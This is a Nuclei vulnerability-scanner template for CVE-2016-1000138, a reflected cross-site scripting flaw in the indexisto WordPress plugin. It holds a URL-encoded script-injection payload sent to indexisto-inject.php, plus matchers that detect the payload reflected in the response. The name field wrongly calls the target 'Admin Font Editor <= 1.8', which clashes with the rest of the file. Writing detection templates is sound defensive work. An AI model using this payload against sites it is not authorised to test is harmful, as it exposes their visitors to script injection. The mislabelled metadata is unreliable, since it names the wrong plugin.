my-nuclei-templates/CVE-2016-1000138.yaml

39 lines
1.1 KiB
YAML
Executable File

id: CVE-2016-1000138
info:
name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin indexisto v1.0.5
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=38
- https://wordpress.org/plugins/indexisto
- http://web.archive.org/web/20210622181116/https://www.securityfocus.com/bid/93816
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000138
cwe-id: CWE-79
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200